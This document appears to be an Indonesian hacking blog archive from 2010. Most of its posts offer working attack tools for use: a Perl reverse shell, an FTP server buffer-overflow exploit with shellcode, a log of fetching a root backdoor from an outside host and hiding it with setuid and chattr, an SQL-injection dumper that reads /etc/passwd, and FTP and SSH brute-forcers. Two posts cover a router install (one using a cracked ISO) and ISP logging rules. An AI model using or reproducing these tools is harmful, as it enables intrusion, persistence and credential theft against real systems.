Xr0b0t Website: Februari 2010

Back Conect Perl IH

Posted on 10.55 by CS-31

code:

#!/usr/bin/perl
use IO::Socket;
#Indonesia Hacker Community
#Connect Back Shell          
#Yogyacarderlink Crew                                       
#
#error-engine@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by Indonesia hacker community Connect Back Shell  ==--
#
#cara pake : dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#error-engine@Linuxmerdeka:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vERSION 99 Shell==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#--== ConnectBack Backdoor Shell vERSION 99 Shell ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system    = '/bin/sh';
$ARGC=@ARGV;
print "--== Fucking Machine ==-- \n\n";
if ($ARGC!=2) {
  print "Usage: $0 [Host] [Port] \n\n";
  die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor Shell by GheMaX ==--  \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

1 komentar

Cara Instalasi Mikrotik Sebagai Router

Posted on 10.43 by CS-31

Pertama kali yang harus di siapkan adalah komputer server minimal dengan spesifikasi :
prosesor PII
Memory 128
NIC (LANCARD) 2 buah
Hardisk minimal 1giga
CDroom

1. Mulailah mendownload mikrotiknya, download ISO nya disini : http://www.indowebster.com/mikrotik2927crackediso.html ini yang versi 2.9.27 free edition

2. Kemudian bakar di CD, burning Image.

3. Setelah itu, masukkan cd yang tadi telah terisi mikrotik kedalam komputer server kemudian hidupin komputer tersebut.

4. Tunggu hingga pada komputer muncul seperti dibawah ini :

5.Setelah itu tekan tombol ‘a’ (tanpa petik) untuk meng-install semua fasilitas yang terdapat pada mikrotik dan ketik ' i ' untuk menginstall.

6.Biarkan saja porses berjalan, karena instalasi sedang berlangsung, mulai dari formating disk hingga proses selesai instalasi, jika muncul tampilan seperti di bawah ini maka instalasi telah selesai.

7.Setelah proses selesai, download lah tool bawaan mikrotik, (winbox) bisa di download disini :

http://www.mikrotik.co.id/getfile.php?n ... 2.2.11.exe

8. Setelah itu tancapkan kabel dari modem ADSL ke lancard satu pada komputer yang telah di install mikrotik.

9. Kemudian LanCard kedua ke sebuah HUB / swicth untuk jaringan lokal.

10. Instalasi telah selesai dilakukan, sekarang remote komputer server yang telah di instalasi di atas dengan winbox yang telah kita download, dengan menggunakan komputer lain.

11. Pilih router yang tadi kita install, default identity nya mikrotik, username admin, password kosong.

12. Pilih menu Interface, jika telah berjalan dengan benar, maka akan muncul 2 buah interface lancard.

13. Double Klik pada salah interface yang merujuk ke lokal dan beri nama Lokal.

14. Dengan cara yang sama, Interface yang merujuk ke modem beri nama Publik.

15. Setelah itu, pilih menu IP address.

16. Muncul Tampilan seperti i bawah ini, kemudian tekan tombol plus + di pojok kiri nya.

17. # Tambahkan Ip addressnya, misal
IP modem Speedy 192.168.1.1, maka IP pada mikrotik : 192.168.1.2/24 dan berinama

kemudian tekan tombol plus + di pojok kiri nya, kmudian tambahkan IP address nya Lancard Satunya lagi :
misalnya Ip pada lokal 10.10.10.1, maka masukkan IP address 10.10.10.1/27, angka /27 untuk 30 host IP, anda bisa mempelajarinya lebih lanjut tentang konsep subnetting disini :
Konsep dasar IP address : http://www.forummikrotik.com/beginner-i ... dress.html
Konsep Subneting : http://www.forummikrotik.com/beginner-i ... takut.html

18. setelah itu pilih IP dan kemudian pilih sub Menu Routes.

19. Kmudian masukkan IP gateway nya, dengan cara menekan tombol plus + di pojok kiri nya yaitu IP dari Modem 192.168.1.1, kmudian tekan tombol OK.

20. Setelah semua langkah di atas selesai, langkah selanjutnya adalah mengisi DNS dengan cara pilih menu IP > DNS.

21. Pilih Setting dan masukkan IP dns, dengan primary DNS 202.134.1.10 (default speedy) yang kedua secondary DNS 202.134.0.155 (DNS speedy).

22. Setelah selesai tahap akhir yang anda harus lakukan, yaitu membuat rule untuk bisa di pergunakan secara lokal. Tahap ini sangat penting, dimana komunikasi lancard 1 dengan lancard 2 diletakkan disini. Inti dari setting diatas ada pada tahap ini, maka jangan sampe kliru.

23. Pilih IP > Firewall > NAT > General.

24. Chain = srcnat, Out interface = Publik (interface tadi yang telah kita beri nama publik) kmudian pilih action = masquerade kemudian tekan tombol OK untuk mengakhirinya.

25. # Lakukan restart pada router dengan cara menekan New Terminal , kmudian menggetikkan script system reboot, dan tekan Y

26.Setelah selesai restart lakukan pengecekan dangan cara ping, masuk pada New terminal ping pada gateway 192.168.1.1, ping pada DNS 202.134.1.10, kalo terjadi replay brarti router udah OK.

27. Jika terjadi Riquest Time Out, brarti anda tinjau ulang pada router anda atau pada lancard anda, atau pada modem anda, atau pada koneksi anda dengan speedy
28.Sekarang instalasi bisa di katakan telah selesai, tinggal meneruskan IP ke semua client dimulai dari 10.10.10.2 dan seterusnya hingga 10.10.10.30 karena subnet yang kita buat tadi 30 host.

Semoga tutorial ini dapat bermanfaat. Dan mudah2an tutorial selanjutnya menyusul.

Wassalamu'alaikum...

Sumber : MC-crew.org

0 komentar

Bot Shell HN

Posted on 22.39 by CS-31

buat temen2 ini dy bot shell

gimana caranya

caranya sangat gampang setelah kamu inject shell upload aja file ini ke website

kemudian

setelah itu exute dengan module perl

caranya

perl file.txt

dan hasilnya seperti ini

udah cukup kayak gitu doang

script bisa di download di

selamat mencoba

0 komentar

ISP Wajib Serahkan Rekaman Transaksi Koneksi Internet Kepada ID-SIRTII

Posted on 22.11 by CS-31

Setiap penyelenggara jasa akses internet (ISP) dan penyelenggara jasa interkoneksi internet (NAP) wajib mengirimkan dan menyimpan rekaman transaksi koneksi (log file) kepada Dewan Pengawas Internet Indonesia atau ID-SIRTII (Indonesia Security Incident Response Team On Internet Infrastructure). Kewajiban tersebut tertuang dalam Surat Edaran Ditjen Postel No. 48/DJPT/3/KOMINFO/II/2009 tanggal 11 Februari 2009.

Yang dimaksud dengan rekaman aktivitas transaksi koneksi (log file) adalah suatu file yang mencatat akses pengguna pada saluran akses operator penyelenggara jasa akses berdasarkan: alamat asal protokol internet (source address), alamat tujuan (destination address), jenis protokol yang digunakan, port asal (source port), port tujuan (destination port), waktu (time stamp) dan durasi terjadinya transaksi. Perekaman transasksi koneksi ini harus dilakukan pada: traksaksi koneksi gateway internasional, transaksi koneksi Remote Access Service, transaksi koneksi jaringan distribusi pelanggan, transaksi koneksi local peering dan transaksi koneksi lainnya yang dilakukan sesuai dengan perkembangan teknologi.

Pelaporan rekaman aktivitas transaksi koneksi ini nantinya dikategorikan sebagai dokumen rahasia yang akan disimpan oleh ID-SIRTII. Bukti adanya pelaporan rekaman aktivitas ini akan dijadikan salah satu ukuran dalam evaluasi terhadap kinerja dan laporan penyelenggaraan tahun 2009.

Pada izin penyelenggaraan telekomunikasi saat ini, terdapat klausul yang menyangkut kewajiban pengamanan jaringan dimana disebutkan, bahwa suatu perusahaan penyelenggara telekomunikasi wajib mengikuti ketentuan-ketentuan peraturan yang terkait dengan usaha-usaha untuk menjaga keamanan internet, termasuk penyamaan setting waktu (clock synchronizer), menjaga gangguan hacking, spamming dan pornografi. Di samping itu, perusahaan tersebut juga diwajibkan untuk menyampaikan data dan/atau meneruskan log file akses (trafik) internet kepada sistem penyimpanan yang disediakan oleh pemerintah untuk keperluan keamanan jaringan internet. Sedangkan sanksinya yang juga disebutkan pada izin tersebut (yang sepenuhnya diketahui oleh pemegang izin yang bersangkutan) menyebutkan, bahwa setiap kelaian pemenuhan kewajiban sebagaimana dimaksud pada point tersebut di atas diberikan peringatan tertulis sebanyak 3 kali berturut-turut dengan tenggang waktu peringatan masing-masing 7 hari kerja. Dan apabila peringatan tertulis tidak diindahkan, maka akan dilakukan pencabutan izin.

Kewajiban pengiriman log file dari para penyelenggara jasa telekomunikasi ini, menurut Depkominfo, sama sekali tidak mengganggu privasi publik, karena rekaman transaksi (log file) yang diminta tidak sampai hingga level konten (isi materi penggunaan internet), karena hanya meliputi alamat asal protokol internet(source address), alamat tujuan(destination address), jenis protokol yang digunakan, port asal (source port), port tujuan(destination port), waktu (time stamp) serta durasi terjadinya transaksi. Data yang telah diterima dari ISP, akan dikelola penyimpannya oleh ID-SIRTII untuk dipergunakan dalam rangka proses penegakan hukum dimana data yang diterima telah terenkripsi sehingga bersifat rahasia.

sumer : http://www.wikimu.com

0 komentar

Easy FTP Server v1.7.0.2 CWD Remote BoF

Posted on 12.18 by CS-31

=======================================================================================
#!/usr/bin/python
import socket, sys

print """
*************************************************
*   Easy FTP Server 1.7.0.2 Remote BoF  *
*       Discovered by: athleet          *
*   jonbutler88[at]googlemail[dot]com   *
*************************************************
"""

if len(sys.argv) != 3:
    print "Usage: ./easyftp.py  "
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

# Calc.exe PoC shellcode - Tested on XP Pro SP3 (Eng)
#
# B *0X009AFE44
#
shellcode = (
"\xba\x20\xf0\xfd\x7f" #            MOV EDX,7FFDF020
"\xc7\x02\x4c\xaa\xf8\x77" #        MOV DWORD PTR DS:[EDX],77F8AA4C
"\x33\xC0" #                        XOR EAX,EAX
"\x50" #                            PUSH EAX
"\x68\x63\x61\x6C\x63" #            PUSH 636C6163
"\x54" #                            PUSH ESP
"\x5B" #                            POP EBX
"\x50" #                            PUSH EAX
"\x53" #                            PUSH EBX
"\xB9\xC7\x93\xC2\x77" #            MOV ECX,77C293C7
"\xFF\xD1" #                        CALL ECX
"\xEB\xF7" #                        JMP SHORT 009AFE5B
)

nopsled = "\x90" * (268 - len(shellcode))

ret = "\x58\xFD\x9A\x00"

payload = nopsled + shellcode + ret # 272 bytes

print "[+] Launching exploit against " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((target, port))
    print "[+] Connected!"
except:
    print "[!] Connection failed!"
    sys.exit(0)
s.recv(1024) 
s.send('USER anonymous\r\n') 
s.recv(1024) 
s.send('PASS anonymous\r\n') 
s.recv(1024)
# Send payload...
print "[+] Sending payload..."
s.send('CWD ' + payload + '\r\n') 
try:
    s.recv(1024)
    print "[!] Exploit failed..."
except:
    print"[+] Exploited ^_^"

=======================================================================================

0 komentar

Root Shell Backdoor

Posted on 05.55 by CS-31

: sh-3.00# cd /bin sh-3.00# wget trendhoby.com/.ray/rsh.txt --05:13:12-- http://trendhoby.com/.ray/rsh.txt => `rsh.txt' Resolving trendhoby.com... 219.83.122.166 Connecting to trendhoby.com|219.83.122.166|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 481 [text/plain] 100%[====================================>] 481 --.--K/s 05:13:15 (57.34 MB/s) - `rsh.txt' saved [481/481] sh-3.00# su [root@localhost bin]# mv rsh.txt rsh.c [root@localhost bin]# gcc -o main rsh.c [root@localhost bin]# chmod gu+s main [root@localhost bin]# chmod o+x main [root@localhost bin]# chattr +i main [root@localhost bin]# rm -f rsh.c [root@localhost bin]# exit exit sh-3.00# exit exit [cs-31@localhost local24]$ main -==[ Root Shell Backdoor ]==- -==[ Hacker-Newbie Community ]==- -==[ www.Hacker-Newbie.Org ]==- Starting Interactive Shell... Session Started. Enjoy the hack !! [root@localhost local24]# [root@localhost local24]# id;whoami uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) root [root@localhost local24]#

3 komentar

Bug & exploit 2010

Posted on 08.20 by CS-31

0 komentar

pwd-sql py cobak aja

Posted on 08.12 by CS-31

#!/usr/bin/perl

###########################################################################################

# -[+]- SQL-PwnZ v1.1 | By Login-Root -[+]- ###

###########################################################################################

# [+] inf0: ###

###########################################################################################

# It Searchs: ###

# =========== ###

# - Nº of columns ###

# - Information_Schema && MySQL.User ###

# - LOAD_FILE ###

# - Tables ###

# - Columns ###

# ###

# ...and save it on a nice text file. ###

# ###

###########################################################################################

# [+] Use: ###

###########################################################################################

# perl sqlpwnz.pl [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK] ###

# [WEBSITE]: http://www.web.com/index.php?id= ###

# [COLUMNS]: Limit of columns to check ###

# [FILE]: File where save the results ###

# [COMMENT]: '/*' or '--' (Without '') (Optional) ###

# [-T]: Try to brute force tables (Optional) ###

# [-C]: Try to brute force columns (Optional) ###

# [-NOCHECK]: Skip the initial check (Optional) ###

###########################################################################################

# [+] c0ntact: ###

###########################################################################################

# MSN: no.more@passport.com ###

# Jabber: login-root@x23.eu ###

# E-Mail: login_root@yahoo.com.ar ###

# ###

###########################################################################################

# [+] sh0utz: ###

###########################################################################################

# In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; VenoM ; InyeXion ###

# Many thanks to boER, who teach me a little of perl ;D ###

# VISIT: WWW.MITM.CL | WWW.REMOTEEXECUTION.ORG | WWW.DIOSDELARED.COM ###

###########################################################################################

# ARGENTINA PRODUCT :) ###

###########################################################################################

use LWP::Simple;

if(!$ARGV[2])

{

print "\n\n-[+]- SQL-PwnZ v1.1 | By Login-Root -[+]-\n=========================================";

print "\n\nUse: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]\n";

print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limit of columns to check\n[FILE]: File where save the results\n[COMMENT]: '/*' o '--' (Without '') (Optional)\n[-T]: Try to brute force tables (Optional)\n[-C]: Try to brute force columns (Optional)\n[-NOCHECK]: Skip the initial check (Optional)\n\n";

exit (0);

}

@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',

'name','names','nombre','nombres','usuarios','member','members','admin_table',

'miembro','miembros','membername','admins','administrator',

'administrators','passwd','password','passwords','pass','Pass',

'tAdmin','tadmin','user_password','user_passwords','user_name','user_names',

'member_password','mods','mod','moderators','moderator','user_email',

'user_emails','user_mail','user_mails','mail','emails','email','address',

'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',

'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',

'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',

'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',

'sistema_usuario','sistema_password','contrasena','auth','key','senha',

'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',

'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',

'membros','utilizadores','staff','nuke_authors','accounts','account','accnts',

'associated','accnt','customers','customer','membres','administrateur','utilisateur',

'tuser','tusers','utilisateurs','password','amministratore','god','God','authors',

'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',

'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');

@nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',

'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',

'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',

'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',

'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',

'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');

if ( $ARGV[0] !~ /^http:/ )

{

$ARGV[0] = "http://" . $ARGV[0];

}

if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--")

{

$cmn.= "+";

$cfin.="--";

print "\n[+] Comments to use: '--' & '+'";

}

else

{

$cmn.= "/**/";

$cfin.= "/*";

print "\n[+] Comments to use: '/*' & '/**/'";

}

open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n";

if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK")

{

print "\n[!] Skipping the initial check...\n";

print WEB "[WEBSITE]:\n\n$ARGV[0]\n";

}

else

{

print "\n[!] Checking if the website is vulnerable...\n";

$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cfin;

$response=get($sql)or die("[-] Wrong Website, check it\n");

if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/)

{

print "[+] Vulnerable website, script continues...\n";

print WEB "[WEBSITE]:\n\n$ARGV[0]\n";

}

else

{

print "[-] Website apparently not vulnerable to SQL Inyection, try another comment\n\n";

exit(1);

}

print "\n[!] Looking up columns...\n";

for ($column = 0 ; $column < $ARGV[1] ; $column ++)

{

$union.=','.$column;

$inyection.=','."0x6c6f67696e70776e7a";

if ($column == 0)

{

print WEB "\n[COLUMNS]:\n\n";

$inyection = '';

$union = '';

}

$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;

$response=get($sql)or die("[-] Failed to try to find the number of columns, check website\n");

if($response =~ /loginpwnz/)

{

$column ++;

print "[+] The site has $column columns\n\n";

$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;

print "$sql\n";

print WEB "$sql\n";

print "\n[!] Checking if Information_Schema exists...";

$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;

$response=get($sql)or die("[-] Impossible to get Information_Schema\n");

if($response =~ /loginpwnz/)

{

print "\n[+] Information_Schema available...saving in $ARGV[2]";

$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;

print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";

}

else

{

print "\n[-] Information_Schema unavailable";

}

print "\n[!] Checking if MySQL.User exists...";

$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;

$response=get($sql)or die("[-] Impossible to get MySQL.User\n");

if($response =~ /loginpwnz/)

{

print "\n[+] MySQL.User available...saving in $ARGV[2]";

$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;

print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";

}

else

{

print "\n[-] MySQL.User unavailable";

}

while ($loadcont < $column-1)

{

$loadfile.=','.'load_file(0x2f6574632f706173737764)';

$loadcont++;

}

print "\n[!] Checking if it is possible to inject LOAD_FILE...";

$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;

$response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n");

if($response =~ /root:x:/)

{

print "\n[+] LOAD_FILE available...saving in $ARGV[2]";

print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";

}

else

{

print "\n[-] LOAD_FILE unavailable";

}

if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T")

{

print "\n\n[!] Brute forcing tables...";

print WEB "\n\n[TABLES]:\n\n";

foreach $tabla(@nombretabla)

{

chomp($tabla);

$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;

$response=get($sql)or die("[-] Impossible to get tables\n");

if($response =~ /loginpwnz/)

{

print "\n[+] Table $tabla exists...saving in $ARGV[2]";

$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;

print WEB "$sql\n";

}

if ($ARGV[3] =~ "-C" || $ARGV[4] =~ "-C" || $ARGV[5] =~ "-C" || $ARGV[6] =~ "-C")

{

print "\n\n[!] Table to brute force columns: ";

$tabla.=;

chomp($tabla);

print WEB "\n\n[COLUMNS IN TABLE $tabla]:\n\n";

foreach $columna(@nombrecolumna)

{

chomp($columna);

$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;

$response=get($sql)or die("[-] Impossible to get columns\n");

if ($response =~ /loginpwnz/)

{

print "\n[+] Column $columna available...saving in $ARGV[2]";

print WEB "$columna\n";

}

print WEB "\n\n\n[*EOF*]";

print "\n\n[+] Everything saved correctly in $ARGV[2]\n\n";

print "## c0ded by Login-Root | 2008 ##\n\n";

exit (0);

}

print "[-] Impossible to find number of columns, try more columns\n\n";

print "## c0ded by Login-Root | 2008 ##\n\n";

exit (0);

tool diatas hampir sama dengan schemafuzz

silakan di cobak juga heheheheh

0 komentar

ftp crack login py

Posted on 08.11 by CS-31

#!/usr/bin/python

################################################################

# .___ __ _______ .___ #

# __| _/____ _______| | __ ____ \ _ \ __| _/____ #

# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #

# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #

# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #

# \/ \/ \/ #

# ___________ ______ _ __ #

# _/ ___\_ __ \_/ __ \ \/ \/ / #

# \ \___| | \/\ ___/\ / #

# \___ >__| \___ >\/\_/ #

# est.2007 \/ \/ forum.darkc0de.com #

################################################################

# This is ftp brute force tools .

# This was written for educational purpose and pentest only. Use it at your own risk.

# Suggestion ! don't use very large wordlist, because system need to read it first for a while and do it @ brute time... "that's cause LOSS" maybe you can use time.sleep(int)

# VISIT : http://www.devilzc0de.com

# CODING BY : gunslinger_

# EMAIL : gunslinger.devilzc0de@gmail.com

# TOOL NAME : ftpbrute.py v1.0

# Big thanks darkc0de member : d3hydr8, Kopele, icedzomby, VMw4r3 and all member

# Special thanks to devilzc0de crew : mywisdom, petimati, peneter, flyff666, rotlez, 7460, xtr0nic, devil_nongkrong, cruzen and all devilzc0de family

# Greetz : all member of jasakom.com, jatimcrew.com

# Special i made for jasakom member and devilzc0de family

# Please remember... your action will be logged in target system...

# Author will not be responsible for any damage !!

# Use it with your own risk

import sys

import time

import os

from ftplib import FTP

if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':

SysCls = 'clear'

elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':

SysCls = 'cls'

else:

SysCls = 'unknown'

log = "ftpbrute.log"

file = open(log, "a")

def MyFace() :

os.system(SysCls)

print "\n .___ .__ .__ _______ .___ "

print " __| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __ "

print " / __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ / "

print " / /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ / "

print " \____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/ "

print " \/ \/ \/ \/ \/ \/ \/ \/ \/ "

print " http://www.devilzc0de.com "

print " by : gunslinger_ "

print " ftpbrute.py version 1.0 "

print " Brute forcing ftp target "

print " Programmmer : gunslinger_ "

print " gunslinger[at]devilzc0de[dot]com "

print "_______________________________________________________________________________________________________________________________________\n"

file.write("\n .___ .__ .__ _______ .___ ")

file.write("\n __| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __ ")

file.write("\n / __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ / ")

file.write("\n / /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ / ")

file.write("\n \____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/ ")

file.write("\n \/ \/ \/ \/ \/ \/ \/ \/ \/ ")

file.write("\n http://www.devilzc0de.com ")

file.write("\n by : gunslinger_ ")

file.write("\n ftpbrute.py version 1.0 ")

file.write("\n Brute forcing ftp target ")

file.write("\n Programmmer : gunslinger_ ")

file.write("\n gunslinger[at]devilzc0de[dot]com ")

file.write("\n_______________________________________________________________________________________________________________________________________\n")

def HelpMe() :

MyFace()

print 'Usage: ./ftpbrute.py [options]\n'

print 'Options: -t, --target | Target to bruteforcing '

print ' -u, --user | User for bruteforcing'

print ' -w, --wordlist | Wordlist used for bruteforcing'

print ' -h, --help | print this help'

print ' \n'

print 'Example: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt \n'

file.write( '\nUsage: ./ftpbrute.py [options]')

file.write( '\nOptions: -t, --target | Target to bruteforcing ')

file.write( '\n -u, --user | User for bruteforcing')

file.write( '\n -w, --wordlist | Wordlist used for bruteforcing')

file.write( '\n -h, --help | print this help')

file.write( '\n maybe you can use time.sleep(int) \n')

file.write( '\nExample: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt \n')

sys.exit(1)

for arg in sys.argv:

if arg.lower() == '-t' or arg.lower() == '--target':

hostname = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-u' or arg.lower() == '--user':

user = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-w' or arg.lower() == '--wordlist':

wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-h' or arg.lower() == '--help':

HelpMe()

elif len(sys.argv) <= 1:

HelpMe()

def BruteForce(word) :

print "[?]Trying :",word

file.write("\n[?]Trying :"+word)

try:

ftp = FTP(hostname)

ftp.login(user, word)

ftp.retrlines('list')

ftp.quit()

print "\n\t[!] Login Success ! "

print "\t[!] Username : ",user, ""

print "\t[!] Password : ",word, ""

print "\t[!] Hostname : ",hostname, ""

print "\t[!] Log all has been saved to",log,"\n"

file.write("\n\n\t[!] Login Success ! ")

file.write("\n\t[!] Username : "+user )

file.write("\n\t[!] Password : "+word )

file.write("\n\t[!] Hostname : "+hostname)

file.write("\n\t[!] Log all has been saved to "+log)

sys.exit(1)

except Exception, e:

#print "[-] Failed"

pass

except KeyboardInterrupt:

print "\n[-] Aborting...\n"

file.write("\n[-] Aborting...\n")

sys.exit(1)

def Action ():

MyFace()

print "[!] Starting attack at %s" % time.strftime("%X")

print "[!] System Activated for brute forcing..."

print "[!] Please wait until brute forcing finish !\n"

file.write("\n[!] Starting attack at %s" % time.strftime("%X"))

file.write("\n[!] System Activated for brute forcing...")

file.write("\n[!] Please wait until brute forcing finish !\n")

Action()

try:

words = open(wordlist, "r").readlines()

except(IOError):

print "\n[-] Error: Check your wordlist path\n"

file.write("\n[-] Error: Check your wordlist path\n")

sys.exit(1)

print "\n[+] Loaded:",len(words),"words"

print "[+] Server:",hostname

print "[+] User:",user

print "[+] BruteForcing...\n"

for word in words:

BruteForce(word.replace("\n",""))

file.close()

scrip di atas unutk brute port ssh login

selamat mencoba juga hehehe

1 komentar

SSh Brute dot PY

Posted on 07.53 by CS-31

#!/usr/bin/python

# This is SSH brute force

# This was written for educational purpose and pentest only. Use it at your own risk.

# VISIT : http://www.devilzc0de.com

# CODING BY : gunslinger_

# EMAIL : gunslinger@devilzc0de.com

# TOOL NAME : Sshbruter.py

# Inspire by : petimati

# Special thanks : mywisdom, petimati, kiddies, flyff666, rotlez, 7460, devil_nongkrong, vie and all devilzc0de family

# Greetz : all member of jasakom.com, jatimcrew.com

# Special i made for jasakom member and devilzc0de family

# Please remember... your action will be logged in target system...

# Author will not be responsible for any damage !!

# Use it with your own risk

import sys, time, os

# check connections...

def handleError(e):

print "\tSorry connection failed ! please check your internet connection"

# Yeah, we must have best view right ?

if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin' or sys.platform == 'Linux' :

bersihlayar = 'clear'

hapuslog = 'rm -f *.log'

hapusbak = 'rm *.py~'

else:

bersihlayar = 'cls'

hapuslog = 'del *.log'

hapusbak = 'del *.py~'

try:

import pexpect, pxssh

except(ImportError):

print "\nYou need the pexpect module." # If you don't have pexpect module check my suggestion link

print "For more information check it out : http://pexpect.sourceforge.net/pexpect.html or http://wiki.openmoko.org/wiki/Pexpect\n"

sys.exit(1)

# Here the usefull commands...

